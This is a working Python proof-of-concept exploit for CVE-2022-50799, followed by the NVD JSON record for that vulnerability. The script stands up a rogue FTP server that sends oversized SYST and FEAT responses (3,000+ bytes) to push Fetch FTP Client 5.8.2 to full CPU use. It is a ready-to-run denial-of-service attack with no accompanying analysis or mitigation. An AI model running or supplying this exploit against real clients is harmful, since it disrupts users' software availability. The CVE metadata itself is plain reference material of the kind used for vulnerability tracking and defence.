CVE-2022-50799

#!/usr/bin/env python3 """ CVE-2022-50799 PoC - Fetch FTP Client Long Response DoS This PoC demonstrates how a malicious FTP server can trigger 100% CPU usage in Fetch FTP Client 5.8.2 by sending excessively long responses (>2KB). """ import socket import threading import time class MaliciousFTPServer: def __init__(self, host='0.0.0.0', port=21): self.host = host self.port = port self.server_socket = None def start(self): """Start the malicious FTP server""" self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.server_socket.bind((self.host, self.port)) self.server_socket.listen(5) print(f"[*] Malicious FTP server listening on {self.host}:{self.port}") try: while True: client_socket, addr = self.server_socket.accept() print(f"[+] Connection from {addr}") thread = threading.Thread(target=self.handle_client, args=(client_socket,)) thread.daemon = True thread.start() except KeyboardInterrupt: print("\n[*] Server shutting down...") finally: self.server_socket.close() def handle_client(self, client_socket): """Handle FTP client connection and send malicious responses""" try: # Send FTP welcome message client_socket.send(b"220 Malicious FTP Server\r\n") while True: data = client_socket.recv(1024).decode('utf-8', errors='ignore') if not data: break command = data.strip().upper() if command.startswith("USER"): client_socket.send(b"331 User name okay, need password.\r\n") elif command.startswith("PASS"): client_socket.send(b"230 User logged in.\r\n") elif command.startswith("SYST"): # Send excessively long response (>2KB) to trigger DoS # This causes high CPU usage in vulnerable Fetch FTP Client long_response = "215 " + "A" * 3000 + "\r\n" client_socket.send(long_response.encode()) print(f"[!] Sent malicious SYST response ({len(long_response)} bytes)") elif command.startswith("FEAT"): # Another vector: long FEAT response long_response = "211-Features:\r\n" + " " * 100 + "X" * 3000 + "\r\n211 End\r\n" client_socket.send(long_response.encode()) print(f"[!] Sent malicious FEAT response ({len(long_response)} bytes)") elif command.startswith("QUIT"): client_socket.send(b"221 Goodbye.\r\n") break else: client_socket.send(b"200 Command okay.\r\n") except Exception as e: print(f"[-] Error handling client: {e}") finally: client_socket.close() if __name__ == "__main__": print("=" * 60) print("CVE-2022-50799 - Fetch FTP Client DoS PoC") print("=" * 60) print("\nThis PoC creates a malicious FTP server that sends") print("excessively long responses (>2KB) to trigger high CPU") print("usage in vulnerable Fetch FTP Client 5.8.2 versions.\n") server = MaliciousFTPServer(host='0.0.0.0', port=21) server.start()

{"cve": {"id": "CVE-2022-50799", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:47.087", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fetch FTP Client 5.8.2 contains a denial of service vulnerability that allows attackers to trigger 100% CPU consumption by sending long server responses. Attackers can send specially crafted FTP server responses exceeding 2K bytes to cause excessive resource utilization and potentially crash the application."}, {"lang": "es", "value": "Fetch FTP Cliente 5.8.2 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes provocar un consumo del 100% de la CPU mediante el envío de respuestas largas del servidor. Los atacantes pueden enviar respuestas de servidor FTP especialmente diseñadas que superen los 2K bytes para causar una utilización excesiva de recursos y potencialmente bloquear la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50696", "source": "[email protected]"}, {"url": "https://www.fetchsoftworks.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/fetch-softworks-fetch-ftp-client-remote-cpu-consumption-denial-of-service", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php", "source": "[email protected]"}]}}